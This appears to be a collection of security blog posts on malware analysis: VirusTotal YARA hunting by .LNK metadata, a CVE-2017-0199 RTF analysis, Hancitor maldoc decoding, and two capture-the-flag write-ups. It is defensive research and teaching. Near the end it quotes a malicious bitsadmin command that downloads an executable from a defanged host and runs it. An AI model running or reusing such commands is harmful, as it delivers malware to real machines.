Hunting malware with metadata

A while ago Michel wrote a blog post Tracking threat actors through .LNK files.

In this post, we want to illustrate how VirusTotal (retro) hunting can be leveraged to extract malware samples and metadata linked to a single threat actor. We use the power of YARA rules to pinpoint the metadata we are looking for.

With some of the metadata extracted from the .LNK file we wrote about in our previous blog post (Volume ID and MAC address), we’re going to search on VirusTotal for samples with that metadata. It is clear from the MAC address 00:0C:29:5A:39:04 that the threat actor used a virtual machine to build malware: 00:0C:29 is an OUI owned by VMware. We wonder if the same VM was used to create other samples.
With a VirusTotal Intelligence subscription, one can search through the VirusTotal sample database, for example with YARA rules. We use the following YARA rule for the metadata:

$BirthObjectId = {C2 CC 13 98 18 B9 E2 41 82 40 54 A8 AD E2 0A 9A}
$MACAddress = {00 0C 29 5A 39 04}
all of them

VTI supports hunting and retro-hunting with YARA rules. With hunting, you will be informed each time your YARA rules triggers on the VT servers each time a newly submitted sample matching your rule. With retro-hunting, YARA rules are used to scan through 75TB of samples in the VT database. This correspond more or less to the set of samples submitted in the last three months.
Here is the result from a retro-hunt using YARA rule MALDOC_LNK:

Next step is to download and analyse all these samples. Since we did not include a file type condition in our YARA rule, we get different types of files: Word .doc files, .lnk files, raw OLE streams containing .lnk files, and MIME files (e-mails with Word documents as attachment).
With this command we search for strings containing “http” in the samples:

So we see that the same virtual machine has been used to created several samples. Here we extract the commands launched via the .lnk file:

There are 2 types of commands: downloading one executable; and downloading one executable and a decoy document.

The metadata from the OLE files reveals that the virtual machine has been used for a couple of weeks:


With metadata and VirusTotal, it is possible to identify samples created by the same actor over a period of 3 months. These samples can provide new metadata and IOCs.

Analysis of a CVE-2017-0199 Malicious RTF Document

There is a new exploit (CVE-2017-0199) going around for which a patch was released by Microsoft on 11/04/2017. In this post, we analyze an RTF document exploiting this vulnerability and provide a YARA rule for detection. is a Python tool to analyze RTF documents. Running it on our sample produces a list with all “entities” in the RTF document (text enclosed between {}):

This is often a huge list with a lot of information. But here, we are interested in OLE 1.0 objects embedded within this RTF file. We can use the filter with option -f O for such objects:

There are 2 entities (objdata and datastore) with indices 153 and 249 (this is a number generated by rtfdump, it is not part of the RTF code). The content of an object is encoded with hexadecimal characters in an RTF file,  entity 153 contains 5448 hexademical characters. So let’s take a look by selecting this entity for deeper analysis with option -s 153:

In this hex/ascii dump, we can see that the text starts with 01050000 02000000, indicating an OLE 1.0 object. As the second line starts with d0cf11e0, we can guess it contains an OLE file.

With option -H, we can convert the hexadecimal characters to binary:

Now we can see the string OLE2Link, which has often been referred to when talking about this zero-day. With option -i, we can get more information about the embedded object:

So it is clearly an embedded OLE file, and the name OLE2Link followed by a zero byte was chosen to identify this embedded OLE file. With option -E, we can extract the embedded object:

Since this is an OLE file, we can analyze it with we dump the file with option -d and pipe it into oledump:

The OLE file contains 2 streams. Let’s take a look at the first stream:

We can recognize a URL, let’s extract it with strings:

Because of vulnerability CVE-2017-0199, this URL will automatically be downloaded. The web server serving this document, will identify it as an HTA file via a Content-Type header:

Because this download is performed by the URL Moniker, this moniker will recognize the content-type and open the downloaded file with Microsoft’s HTA engine. The downloaded HTA file might look to us like an RTF file, but the HTA parser will find the VBS script and execute it:

This VBS script performs several actions, ultimately downloading and executing a malicious executable.


Let’s take a second look at the first stream in the OLE file (the stream with the malicious URL):

The byte sequence that we selected here (E0 C9 EA 79 F9 BA CE 11 8C 82 00 AA 00 4B A9 0B), is the binary representation of the URL Moniker GUID: {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}. Notice that the binary byte sequence and the text representation of the GUID is partially reversed, this is typical for GUIDs.

After the URL Moniker GUID, there is a length field, followed by the malicious URL (and then followed by a file closing sequence, …).

We use the following YARA rule to hunt for these RTF documents:

rule rtf_objdata_urlmoniker_http {
 $header = "{\\rtf1"
 $objdata = "objdata 0105000002000000" nocase
 $urlmoniker = "E0C9EA79F9BACE118C8200AA004BA90B" nocase
 $http = "68007400740070003a002f002f00" nocase
 $header at 0 and $objdata and $urlmoniker and $http

Remark 1: we do not search for string OLE2Link

Remark 2: with a bit of knowledge of the RTF language, it is trivial to modify documents to bypass detection by this rule

Remark 3: the search for http:// (string $http) is case sensitive, and if you want, you can omit it (for example, it will not trigger on https).

Remark 4: there is no test for the order in which these strings appear

Happy hunting!

CSCBE Challenge Write-up – Sufbo

The Sufbo challenge was tackled during the Cyber Security Challenge qualifiers and proved to be very difficult to solve. This write-up gives you a possible way of solving it!


All challenges of the Cyber Security Challenge are created by security professionals from many different organisations. The Sufbo challenge in particular was created by Adriaan Dens, one of our distinguished challenge contributors, from Proximus. Adriaan & Proximus have contributed multiple challenges over the years and they tend to be pretty hard to solve ;).

The challenge

And you thought Assembly was hard to read? Try this!

The solution

The challenge consists out of a heavily obfuscated piece of perl code. We can start by cleaning up the code which improves the readability by a small bit:

print"Flag: ";
die if y///c!=32;

while($,=substr$_,8*$-,8) {
    ($@,$*,$#,$x,$y,$z,$!,$.,$,) = (unpack("N*",$/.$,),0,2**31*(sqrt(5)-1),(1<<32)-1);
    map {
    die if$"ne pack"H*",$_[$-];
print "OK\n"


This code might still not mean a lot to the average non-perl-speaking-person. Let’s take a look at the same code, but with some inline comments:

print"Flag: "; # Prints "Flag: " to STDIN
chomp($_=<>); # Reads in the input into the variable $_
$[=0; # Changes the starting index of an array to 0 (It's a useless command actually)
die if y///c!=32; # y///c is a Perl golfing idiom that is similar to length($_), so the length of your input has to be a string of length 32.
chomp(@_=<DATA>); # Store the data below (under __DATA__) in the array @_
$/=join'',map{chr(ord$_^$=)}split//,pack"H*",shift(@_).shift(@_); # Shift the first two elements of @_, "unhexify" the strings, split them per character, XOR with $= (default value is 60), and join the characters back in the variable $/.
while($,=substr$_,8*$-,8) { # While there are 8 characters left in the input do:
($@,$*,$#,$x,$y,$z,$!,$.,$,) = (unpack("N*",$/.$,),0,2**31*(sqrt(5)-1),(1<<32)-1); # Convert the variable $/ (unknown) and $, (our input) to unsigned numbers, assign 0 to $!, assign 2**31*(sqrt(5)-1) to $/ and assign (1<<32)-1 to $,.
map { # Use map to loop 32 times (see below)
$!+=$.; # Add $. to $!
$!&=$,; # Bitwise AND $! with $,
$y+=((((($z<<4)&$,)+$@)&$,)^(($z+$!)&$,)^((($z>>5)+$*)&$,)); # Some bitwise operations added to $y
$y&=$,; # Bitwise AND $y with $,
$z+=((((($y<<4)&$,)+$#)&$,)^(($y+$!)&$,)^((($y>>5)+$x)&$,)); # Some bitwise operations added to $z
$z&=$,; # Bitwise AND $z with $,
$"=pack("N*",$y,$z); # Convert the unsigned numbers back to string representation
$/=$"x2 # Set $/ to two times $"
}0..31; # Use map to loop 32 times
die if$"ne pack"H*",$_[$-]; # Die if $" is not equal to the "unhexified" element ($- contains the index) in @_
$-++; # Increase the variable $-
} #
print "OK\n" # Printed if you have the key
__DATA__ # Starting the DATA block (kinda like a here document)
6c594e50630d4f63 # This part was used for $/ in line 6.
7d515d4655525b1d # This part was used for $/ in line 6.
7872575285c742da # This part was used to compare with the input on line 20
15c670798094a00b # This part was used to compare with the input on line 20
54f08c6b937ed1f2 # This part was used to compare with the input on line 20
6810afed7372cd76 # This part was used to compare with the input on line 20

So now we more or less know what each line does but we still miss context on a higher level (what it is doing). As always in reverse engineering, you try to find some “known parts” which allow you to understand the code a lot faster. These parts are usually strings, metadata, fixed numbers or familiar code blocks.

In our case, we have 2 fixed numbers: 2**31*(sqrt(5)-1) and (1<<32)-1. In this representation they don’t mean much but if we convert them to hex numbers we get 0x9e3779b9 and 0xffffffff respectively.

Let’s see if our old friend Google knows more about this.

Screen Shot 2017-04-04 at 09.55.02

Hmm, interesting! Seems like we’ve got a Perl implementation of Tiny Encryption Algorithm (TEA) on our hands here!

More specifically, the while loop block in the code is the actual TEA implementation, which decrypts the second half of the __DATA__ section using the first half as the key.

Retrieving the key can be done using the following perl one-liner:

perl -E 'say join"",map{chr(ord$_^$=)}split//,pack"H*","6c594e50630d4f637d515d4655525b1d"

Which yields us “Perl_1s_Amazing!” as the key.

So now we have they key and the data to be decrypted. Let’s be lazy and copy the reference code listed on the wikipedia page we found earlier.


void decrypt (uint32_t* v, uint32_t* k) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i; /* set up */
    uint32_t delta=0x9e3779b9; /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
    for (i=0; i&lt;32; i++) { /* basic cycle start */
        v1 -= ((v0&lt;&lt;4) + k2) ^ (v0 + sum) ^ ((v0&gt;&gt;5) + k3);
        v0 -= ((v1&lt;&lt;4) + k0) ^ (v1 + sum) ^ ((v1&gt;&gt;5) + k1);
        sum -= delta;
    } /* end cycle */
    v[0]=v0; v[1]=v1;
    printf("%x%x", v0, v1);

void main() {
    /* Our cipher chunks, found in the __DATA__ block of the Perl code */
    uint32_t c0[] = { 0x78725752, 0x85c742da };
    uint32_t c1[] = { 0x15c67079, 0x8094a00b };
    uint32_t c2[] = { 0x54f08c6b, 0x937ed1f2 };
    uint32_t c3[] = { 0x6810afed, 0x7372cd76 };

    /* The used keys for encrypting */
    uint32_t k[] = { 0x5065726c, 0x5f31735f, 0x416d617a, 0x696e6721 }; /* Original key: Perl_1s_Amazing! */
    uint32_t k0[] = { 0x78725752, 0x85c742da, 0x78725752, 0x85c742da }; /* c0 . c0 */
    uint32_t k1[] = { 0x15c67079, 0x8094a00b, 0x15c67079, 0x8094a00b }; /* c1 . c1 */
    uint32_t k2[] = { 0x54f08c6b, 0x937ed1f2, 0x54f08c6b, 0x937ed1f2 }; /* c2 . c2 */

    /* Decrypting the chunks */
$ gcc --std=c99 solution.c
$ ./a.out
$ ./a.out | perl -nle 'print pack("H*", $_)'
&gt;&gt;&gt; CSCBE{Perl1sWr1te0nceRe4dn3veRr}

There we go! CSCBE{Perl1sWr1te0nceRe4dn3veRr} was the flag.

Tracking threat actors through .LNK files

In the blog post .LNK downloader and bitsadmin.exe in malicious Office document we were asked the following question by Harlan Carvey:

Did you parse the LNK file for things such as embedded MAC address, NetBIOS system name, any SID, and volume serial number?

We did not do that at the time, however we see the value in this to track specific threat actors throughout different campaigns.

The Windows .LNK file format contains valuable and information that is specific for the host on which that .LNK file has been created including:

  • The MAC address of the host;
  • The NetBIOS system name;
  • the volume serial number.

This is all information that will not easily be changed on the threat actors workstation and which should be fairly unique.

For more information on the .LNK file format, take a look at the following ForensicWiki page:

I used the tool lnkanalyser from woanware to analyse the extracted .LNK file.


Now what information are we seeing here.

NOTE: this tool does not show the relative path, on other .LNK files we tested this was shown. This particular .LNK file’s relative path refers to cmd.exe in the C:\Windows\System32 folder.

The first thing that stands out is the argument, this is everything that is passed on to command line, this has been discussed in the the blog post .LNK downloader and bitsadmin.exe in malicious Office document.

Next interesting item is the Target Metadata. The timestamps shown here are the timestamps of the target executable, in this case cmd.exe, of the executable on the system of the person creating this .LNK file.

Concluding we have four artefacts tied to the workstation on which this .LNK was created that can be used to track a threat actor:

  • Hard disk Serial number: 60BDBF2D
  • Volume ID: C2CC139818B9E241824054A8ADE20A9A
  • Machine ID: 123-¯ª
  • Mac address: 00:0C:29:5A:39:04


Didier Stevens created a comprehensive screencap on how to extract the .LNK file from the Word document and analyze it with lnkanalyzer.exe:


For an extensive explanation of .LNK file attributes, we’d like to refer you to the following research:

CSCBE Challenge Write-up – Trace Me

This is the first post in a series of write-ups on some of the challenges that were tackled by students during our Cyber Security Challenge Belgium this month.


All challenges of the Cyber Security Challenge Belgium are created by security professionals from many different organisations. The TraceMe challenge in particular was created by Vasileios Friligkos, one of our distinguished challenge contributors.

The challenge

At your day job, per your recommendation and after many requests, you recently activated host based monitoring using Sysmon.

Perfect! You are now going to have a visibility on each host of your IT system giving you perfect awareness and detection capabilities that will be able to thwart even the most persistent attackers…
Before you can finish your thoughts, you get interrupted by a phone call:
“Steve”, (yes, this is you) says an irritated voice on the other side of the line.
– “Yes…”, replies Steve (yep, still you).
“Your awesome monitoring system did not work, we got an infection.”
– “But there are no detection rules implemented yet, it’s normal that we didn’t… “, you start explaining when you get interrupted.
“At least, tell me you can identify how the infection occurred!”
Eh, yes sure I can…

And by that, the irritated voice (who by the way is your boss) hangs up and sends you one file with the Sysmon log data of the infected host.

Can you identify the benign (non malicious) process that was abused and was ultimately responsible for the infection?
Can you also identify the IP from where the second stage was downloaded (the first connection made by the malware)?

If so, you will be able to save your reputation and also get the points for this challenge by submitting the SHA1 of the abused, benign process (Uppercase) + the IP where the second stage is hosted.

Good luck Steve!

The solution

Evtx is the Windows event file format which makes sense since Sysmon writes to the “Applications and Services Logs/Microsoft/Windows/Sysmon/Operational” event folder as indicated here:

There are many ways to start interacting with these events, there is even an official Windows log parser that can query event log data.
If we go this way, we have to download the LogParser and run the following command to extract all logs in csv format:

$> LogParser.exe -i:EVT -o:csv "SELECT * from sysmon.evtx" > sysmon.csv

This gives us a .csv file with 3.021 log lines of different sizes and types.
By checking the description of Sysmon on the MS site we see that the following types of events can be logged:

  • Event ID 1: Process creation
  • Event ID 2: A process changed a file creation time
  • Event ID 3: Network connection
  • Event ID 4: Sysmon service state changed
  • Event ID 5: Process terminated
  • Event ID 6: Driver loaded
  • Event ID 7: Image loaded
  • Event ID 8: CreateRemoteThread
  • Event ID 9: RawAccessRead
  • Event ID 10: ProcessAccess
  • Event ID 11: FileCreate
  • Event ID 12: RegistryEvent (Object create and delete)
  • Event ID 13: RegistryEvent (Value Set)
  • Event ID 14: RegistryEvent (Key and Value Rename)
  • Event ID 15: FileCreateStreamHash
  • Event ID 255: Error

Ok, many interesting events that we could use. In the file, we see that we have events of the following types 1, 2, 3, 5 and 6.
Since we do not have any initial information to start investigating and then pivot until the initial infection, we need to search for abnormal or at least unusual behaviour.

For example, we see that we have only one event ID 6 but by investigating the name of the driver and its SHA we realise that it concerns a legitimate driver.

Since there are not so many logs, we could use excel to try and make some sense by colouring for example the log lines based on the event id.

If we zoom out and simply scroll over the logs, we see that there is a very important network activity at some moment:


By simply investigating, we see that there are many UDP requests to port 6892 by a “roaming.exe” process found in “C:\Users\TestPC\AppData\” and with destination adjacent IPs in the same subnet:


This looks surely suspicious and we could take this lead for our investigation but let’s say that we don’t go this way (Steve doesn’t like excel) and we prefer to put our ninja awk skills into use!

Some parsing is necessary since the comma is a field separator but also found inside the fields and there is much useless information that we can dump.
In this case, let’s choose to substitute the field separator by the pipe ( “|” ) in order to be able to use awk easily, let’s also separate the process creation events (event id 1 – file sysmon_process_creation.csv) and the connections events (event id 3 – file sysmon_connections.csv).

For process creation, we keep the following fields:


Let’s filter the data and search for some unusual execution locations or uncommon process names:

awk -F "|" '{ print "Process:"$3 }' sysmon_process_creation.csv | sort | uniq -c | sort -rn


We see two executables from the %AppData% directory:

  • “Roaming.ExE”
  • “OneDrive.exe”

We can pull their SHA1’s and check online whether they are legitimate. Doing so does not reveal clearly if any of them is malicious.

If we try to see the parent processes:

  • “Roaming.ExE” -> powershell and roaming.exe
  • “OneDrive.exe” -> explorer

Hmm, powershell could be something worth investigating, let’s show also the parent process full command:


Ok, this surely looks bad: powershell launched a hidden download of an executable which was also executed at the end of the command.
So, at last, we have our investigation lead: roaming.exe

For information, we could have used the connections log file to help us spot outliers.
By sorting and counting unique occurrences (similar as for process creation logs) of processes and target IPs we do not have a clear result because we have too many chrome.exe processes reaching to multiple IPs

awk -F "|" '{ printf "Process: %-90s DST:%s:%s\n",$3,$13,$15 }' sysmon_connections.csv | sort | uniq -c | sort -rn


But if we ignore the destination IP and focus only on the destination port, then we should have a clearer view:

awk -F "|" '{ printf "Process: %-90s DST_Port:%s\n",$3,$15 }' sysmon_connections.csv | sort | uniq -c | sort -rn


Roaming.exe communicated 1.088 times over port 6892 (on UDP) which when looking online directly leads to Cerber malware.

In both cases, we have roaming.exe which looks malicious and by following its parent process PID we can trace the activities and the initial infection:

  • Roaming.exe PID: 1868 was created by powershell.exe PID: 2076
  • Powershell.exe PID: 2096 was created by cmd.exe PID: 2152

(We notice that there are two processes with the same PID: 2152 – “cmd.exe” and “Acrobat Reader DC\Reader\reader_sl.exe”; keep in mind that PID’s can be reused)

  • Cmd.exe PID: 2152 was created by winword.exe PID: 2232

The parent of winword.exe is explorer.exe which is legitimate and therefore, we can deduce that winword.exe was abused (probably by a macro) and resulted in executing a cmd.exe command that launched a powershell command to fetch the second stage malware (probably cerber according to OSINT).

Therefore, the first part to the solution is the SHA1 of winword.exe:

  • CE3538D04AB531F0526C4C6B1917A7BE6FF59938

For the second part, we need to identify the IP of the site from which the second stage was downloaded.
From the powershell command we know that the URL is: footarepu[.]top but instead of resolving the domain name (since it might have changed since the infection), we can find the IP in the sysmon_connections.csv since we have the PID and process name of all the connections.
Searching for powershell.exe PID: 2076 we find one contacted IP over port 80:


which is the second part of the solution.

Flag: CE3538D04AB531F0526C4C6B1917A7BE6FF59938_35.165.86.173

Good job Steve!

New Hancitor maldocs keep on coming…

Didier Stevens will provide NVISO training on malicious documents at Brucon Spring: Malicious Documents for Blue and Red Teams.

For more than half a year now we see malicious Office documents delivering Hancitor malware via a combination of VBA, shellcode and embedded executable. The VBA code decodes and executes the shellcode, the shellcode hunts for the embedded executable, decodes and executes it.

From the beginning, the embedded executable was encoded with a bit more complexity than a simple XOR operation. Here in the shellcode we see that the embedded executable is decoded by adding 3 to each byte and XORing with 17. Then base64 decoding and the EXE is decoded.


The gang behind Hancitor steadily delivered new maldocs, without changing much to this encoding method. Until about 2 months ago we started to see samples where the XOR key was a WORD (2 bytes) instead of a single byte.

Recently we received a sample that changed the encoding of the embedded executable again. This sample still uses macros, shellcode and an embedded executable:


The encoded shellcode is still in a form (stream 16), and the embedded executable is still in data (stream 5), appended after a PNG image:


If we look at the embedded executable, we see that the pattern has changed: in the beginning, we see a pattern of 4 repeating bytes. This is a strong indication that the group started to adopt a DWORD (4 bytes) key:


We can try to recover the xor key by performing a known plaintext attack: up til now, the embedded executables were base64 encoded and started with TVqQAA… Let’s use xor-kpa to try to recover the key:


We still find no key after trying out all add values between 1 and 16. Could it be that this time, it is just XOR encoded without addition? Let’s try:


Indeed! The key is xP4?.

We can now decode and extract the embedded executable:





The gang behind Hancitor has been creating complex malicious document to deliver their malware, and we constantly have to keep up our analysis techniques.

.LNK downloader and bitsadmin.exe in malicious Office document

We received a malicious office document (529581c1418fceda983336b002297a8e) that tricks the user into clicking on an embedded LNK file which in its turn uses the Microsoft Background Intelligent Transfer Service (BITS) to download a malicious binary from the internet.

The following Word document (in Japanese) claims to be an invoice, the user must click the Word icon to generate the amount to be paid.


When using to analyze this Word document we get the following output:

Screen Shot 2017-03-23 at 18.26.36

As you can see, in stream 8 an embedded OLE object is present. Using the following command we can obtain information on what this embedded OLE object exactly is: -s 8 -i ./document_669883.doc

Screen Shot 2017-03-23 at 18.28.14

The embedded object is thus an LNK file, we can then use the following command to get a hexdump on what this LNK file actually contains: -s 8 ./document_669883.doc

Screen Shot 2017-03-23 at 18.32.19

When going through this hexdump we can spot the intentions of this LNK file:

Screen Shot 2017-03-23 at 18.32.59

Now, to make this a bit easier to read we can use the following command: -s 8 -d document_669883.doc

Which provides the following output:

clean output.png

Opening the LNK file will execute the following command:

C:\Windows\System32\cmd.exe %windir% /c explorer.exe & bitsadmin.exe /transfer /priority high hxxp://av.ka289cisce[.]org/rh72.bin %AppData%\file.exe & %AppData%\file.exe

When looking at the timestamps of the Word document, we noticed that the file was last saved on 2017-03-22 19:20:00. The first sighting of this file on VirusTotal was already at 2017-03-22 23:15:59 UTC, less than 4 hour after it was last saved. This could explain why the link containing the binary file was no longer active at the time of our analysis (12 hours after first sighting on VirusTotal).

If you want to check if your organisation has been impacted by a similar document, you can detect the malicious downloads by looking through your proxy logs and searching for the following user agent: “Microsoft BITS/*”. While there are multiple software packages that use the BITS.EXE to download updates, these are currently still pretty limited, filtering for unique destination hosts will limit your dataset significantly enough for you to be able to spot the outlier(s) easily.